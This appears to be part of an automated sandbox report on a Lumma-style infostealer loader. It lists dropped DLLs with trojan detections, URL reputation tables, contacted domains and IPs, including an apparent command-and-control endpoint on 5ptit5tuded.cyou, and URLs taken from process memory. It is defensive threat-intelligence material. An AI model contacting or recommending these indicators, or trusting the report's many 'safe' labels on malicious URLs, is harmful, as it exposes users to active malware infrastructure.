                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC32.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC64.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\Microsoft.VisualStudio.VsWebProtocol0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\NvStWiz0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\StartupHelper0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQLiteShell.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQRT.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteRes.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteSkinUtils.dll79%ReversingLabsWin32.Trojan.HijackLoader
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\WinRar.exe0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dll65%ReversingLabsWin32.Trojan.Malgent
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\unrar.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1049.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1058.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bpl0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\trading_api64.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\tradingnetworkingsockets.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\vcl120.bpl47%ReversingLabsWin32.Trojan.LummaC
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-multibyte-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-private-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://cf.icq.com/cf/icqlite/legal.html0%Avira URL Cloudsafe
                    5ptit5tuded.cyou0%Avira URL Cloudsafe
                    http://web.icq.com/cf/icqmapIYou0%Avira URL Cloudsafe
                    http://www.icq.americangreetings.com/icqorder.pd?mode=send&design=%s&title=%s&recipient=%s&text=%s&s0%Avira URL Cloudsafe
                    https://www.bitvise.com/00%Avira URL Cloudsafe
                    https://5ptit5tuded.cyou/0%Avira URL Cloudsafe
                    https://5ptit5tuded.cyou/apiob0%Avira URL Cloudsafe
                    http://time.certum.pl00%Avira URL Cloudsafe
                    http://cf.icq.com/cf/icqlite/spam_auto_filter.html2http://cf.icq.com/cf/icqlite/spam_auto_filter.htm0%Avira URL Cloudsafe
                    http://cf.icq.com/cf/2002/icqswatch.html0%Avira URL Cloudsafe
                    https://5ptit5tuded.cyou/api:0%Avira URL Cloudsafe
                    https://5ptit5tuded.cyou/api100%Avira URL Cloudmalware
                    https://ps3.scedev.net/0%Avira URL Cloudsafe
                    http://cf.icq.com/cf/icqlite/zodiac.html0%Avira URL Cloudsafe
                    http://cf.icq.com/cf/icqlite/lost_password.html0%Avira URL Cloudsafe
                    http://www.developershome.com/7-zip/0%Avira URL Cloudsafe
                    https://www.certum.pl/repository.0%Avira URL Cloudsafe
                    https://5ptit5tuded.cyou/U0%Avira URL Cloudsafe
                    http://hi.baidu.com/saqirilatuu/item/9438213716f316ebe7bb7a8d0%Avira URL Cloudsafe
                    http://www.avast.com0/0%Avira URL Cloudsafe
                    http://www.teisininkas.lt/ivairus/7-zip:0%Avira URL Cloudsafe
                    http://cf.icq.com/cf/icqlite/public_private_modes.html0%Avira URL Cloudsafe
                    http://www.icq.com.0%Avira URL Cloudsafe
                    http://www.prizeeinternational.com0%Avira URL Cloudsafe
                    http://cf.icq.com/cf/icqlite/help.html8Failed0%Avira URL Cloudsafe
                    http://wwp.icq.com/%sGSending0%Avira URL Cloudsafe
                    http://cf.icq.com/cf/icqlite/firewall_help.html/http://cf.icq.com/cf/icqlite/fail_register.html/http0%Avira URL Cloudsafe
                    https://5ptit5tuded.cyou/s0%Avira URL Cloudsafe
                    https://5ptit5tuded.cyou/p0%Avira URL Cloudsafe
                    http://ocsp.certum.pl00%Avira URL Cloudsafe
                    https://5ptit5tuded.cyou/apirtyM0%Avira URL Cloudsafe
                    http://wwp.icq.com/%UinStr%0%Avira URL Cloudsafe
                    http://cf.icq.com/cf/icqlite/download_p.html4Please0%Avira URL Cloudsafe
                    http://electricity.co.ke)0%Avira URL Cloudsafe
                    http://cf.icq.com/cf/icqlite/liteskin.html0%Avira URL Cloudsafe
                    http://wwp.icq.com/%dBThe0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    5ptit5tuded.cyou
                    		188.114.97.3
                    		truetrue
                      		unknown
                      rentry.co
                      		172.67.75.40
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        5ptit5tuded.cyoutrue
                        • Avira URL Cloud: safe
                        		unknown
                        peepburry828.sbsfalse
                          		high
                          processhol.sbsfalse
                            		high
                            https://5ptit5tuded.cyou/apitrue
                            • Avira URL Cloud: malware
                            		unknown
                            p10tgrace.sbsfalse
                              		high
                              https://rentry.co/feouewe5/rawfalse
                                		high
                                p3ar11fter.sbsfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://web.icq.com/cf/icqmapIYoupowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://cf.icq.com/cf/icqlite/legal.htmlpowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.vmware.com/0Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.microsoftmsiexec.exe, 0000000A.00000003.2179484797.0000000000752000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.bitvise.com/0powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.icq.americangreetings.com/icqorder.pd?mode=send&design=%s&title=%s&recipient=%s&text=%s&spowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://bugreports.qt.io/Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpfalse
                                          		high
                                          http://cf.icq.com/cf/2002/icqswatch.htmlpowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://rentry.co:443/feouewe5/rawmsiexec.exe, 0000000A.00000003.2197813079.0000000000701000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1820039658.00000198B8FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.icq.com/download/NYoupowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.certum.pl/CPS0powershell.exe, 00000001.00000002.1820039658.00000198BA3ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://cf.icq.com/cf/icqlite/spam_auto_filter.html2http://cf.icq.com/cf/icqlite/spam_auto_filter.htmpowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.phreedom.org/md5)Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                    		high
                                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://5ptit5tuded.cyou/msiexec.exe, 0000000A.00000002.2203799689.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://5ptit5tuded.cyou/apiobmsiexec.exe, 0000000A.00000003.2119251555.0000000000765000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2121215580.0000000000766000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://time.certum.pl0powershell.exe, 00000001.00000002.1820039658.00000198BA3ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0spowershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://dm.origin.com/app.httpProxydevUsingSetup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                  		high
                                                                  http://ocsp.rootca1.amazontrust.com0:msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.msiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.symauth.com/cps0(Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://5ptit5tuded.cyou/api:msiexec.exe, 0000000A.00000003.2090035846.0000000000763000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2119251555.0000000000765000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2121215580.0000000000766000.00000004.00000020.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.icq.com/downloadpowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://cf.icq.com/cf/icqlite/zodiac.htmlpowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://ps3.scedev.net/Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://cf.icq.com/cf/icqlite/lost_password.htmlpowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.symauth.com/rpa00Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.info-zip.org/Setup.exe, 00000004.00000002.1939655810.0000029C06A83000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.00000256401FC000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgmsiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://hi.baidu.com/saqirilatuu/item/9438213716f316ebe7bb7a8dpowershell.exe, 00000001.00000002.1820039658.00000198BB37B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB3B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB3A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB3E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.developershome.com/7-zip/powershell.exe, 00000001.00000002.1820039658.00000198BA127000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA0F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.icq.com/cf/icqlite/connection.htmlpowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.teisininkas.lt/ivairus/7-zip:powershell.exe, 00000001.00000002.1820039658.00000198BB259000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://dm.origin.com/Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                        		high
                                                                                        http://www.phreedom.org/md5)08:27Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                          		high
                                                                                          https://www.certum.pl/repository.powershell.exe, 00000001.00000002.1820039658.00000198BA3ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://ocsp.sectigo.com0powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://cf.icq.com/cf/icqlite/public_private_modes.htmlpowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://5ptit5tuded.cyou/Umsiexec.exe, 0000000A.00000003.2179717349.0000000000701000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.avast.com0/powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.icq.com.powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYimsiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://cf.icq.com/cf/icqlite/help.html8Failedpowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://wwp.icq.com/%sGSendingpowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://cf.icq.com/cf/icqlite/firewall_help.html/http://cf.icq.com/cf/icqlite/fail_register.html/httppowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.icq.compowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://x1.c.lencr.org/0msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://x1.i.lencr.org/0msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.prizeeinternational.compowershell.exe, 00000001.00000002.1820039658.00000198B996B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B999E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://5ptit5tuded.cyou/smsiexec.exe, 0000000A.00000002.2203799689.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://5ptit5tuded.cyou/pmsiexec.exe, 0000000A.00000002.2203799689.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://github.com/netty/netty/issues/6520.sSetup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                            		high
                                                                                                            https://store.steampowered.com/app/UserSetup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                              		high
                                                                                                              https://sectigo.com/CPS0powershell.exe, 00000001.00000002.1820039658.00000198BACA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BABC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAC30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BAE9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://ocsp.thawte.com0powershell.exe, 00000001.00000002.1820039658.00000198B9FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://wwp.icq.com/%UinStr%powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://github.com/netty/netty/issues/6520.Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://statsigapi.netSetup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.vmware.com/0/Setup.exe, 00000004.00000002.1939655810.0000029C06AD9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013616968.0000025640252000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://ocsp.certum.pl0powershell.exe, 00000001.00000002.1820039658.00000198BA3ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://c0rl.m%LSetup.exe, 00000007.00000002.2013467032.000002563FFF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44msiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://5ptit5tuded.cyou/apirtyMmsiexec.exe, 0000000A.00000003.2119251555.0000000000765000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2121215580.0000000000766000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
